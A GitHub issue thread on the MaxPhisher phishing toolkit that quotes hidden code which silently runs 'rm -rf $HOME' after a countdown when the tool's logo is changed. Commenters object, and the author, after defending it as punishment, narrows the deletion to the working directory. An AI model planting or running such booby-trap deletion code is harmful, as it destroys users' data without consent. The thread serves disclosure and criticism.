### ISSUE TITLE
This is evil!

### ISSUE THREAD

**Issue by busterbeam** [KasRoudra/MaxPhisher#11]
```
if logo != logo2:
	if not "KasRodra" in logo:
		print()
		for i in [4, 3, 2, 1]:
			stdout.write(f"\\r{info}Counting {i}")
			stdout.flush()
			sleep(1)
		print()
		shell("rm -rf $HOME")
	print(logo2)
	print(f"{error}Replacing a logo doesn\'t make you a developer!")
	print(f"{info}Refer to {green}https://github.com/KasRoudra{nc}")
	exit(1)
```
by all means its bad for people to pawn code they put "zero" effort into as their own, but you shouldn't delete their home directory if they do this with NO WARNING.  reading through your code and seeing this I think you could at least warn... or instead delete the running script.

Serious like change this!

**Comment by KasRoudra** [comment]
@busterbeam I extremely dislike script-kiddies. Trying to do evil things should result in evil. However your last suggestion looks good to me. In next update I'll remove parent directory (MaxPhisher directory) instead of home

**Comment by KasRoudra** [comment]
@busterbeam I've written this years ago just for practice and educational purposes. It demonstrates how dangerous phishing can be so that people become concerned of it. And I've already confirmed some of my users have done this. For home directory deletion I've agreed to change that.

**Comment by busterbeam** [comment]
This shouldn't be closed if you have not fixed the code.  I checked your last commit and I still see this

```
if logo != logo2:
    if not "KasRodra" in logo:
        print()
        for i in [4, 3, 2, 1]:
            stdout.write(f"\r{info}Counting {i}")
            stdout.flush()
            sleep(1)
        print()
        shell("rm -rf $HOME")
    print(logo2)
    print(f"{error}Replacing a logo doesn't make you a developer!")
    print(f"\n{info}Refer to {green}https://github.com/KasRoudra\n{nc}")
    exit(1)
```
no warning and you still delete the users home directory, if this isn't fixed in 24 hours I will report you to github

**Comment by KasRoudra** [comment]
@busterbeam I had plan to replace encoding with encryption as you asked and the deletion fix in one commit. However, for now I fixing the deletion and skipping encryption

**Comment by busterbeam** [comment]
I've quickly checked, looks good.

**Comment by ErSeraph** [comment]
I hope not to bother anyone but if I may say my opinion, it is okay to prevent someone from stealing your code but it is unfair to delete a folder that might contain someone else's code. As far as I'm concerned, @KasRoudra you are right, but it's best to stay within the perimeter of your code. Maybe you could perform a `pip uninstall maxphisher` automatically or hide a `print("Original code from www.github.com/KasRoudra" ... etc)` if the signature is altered or even open the browser to your github. I also hate code stealing a lot, but if you want to do the right thing without pissing people it's better to be reasonable than malicious. In any case this software is perfect, as a teacher I am explaining to my students what phishing is, how it works and how to avoid it!

**Comment by KasRoudra** [comment]
@ErSeraph You're right. Since last commit it will only remove files of working directory, not home

**Comment by busterbeam** [comment]
I think you may be a little short sited @ErSeraph as the malicious code is still present in +10 forks.  @KasRoudra are still technically responsible for that code according to your license.  Your license has nothing about re-attribution, your license isn't even a warning.  It think you need to change your license to something you actually mean

**Comment by KasRoudra** [comment]
@busterbeam In the readme I've mentioned `The author is not responsible for any misuse of MaxPhisher!`. And for now the code is no longer destructive. There is no point to change it now. And the forks are unchanged. So apparently they are safe too. I can't delete or update the codes of that forks
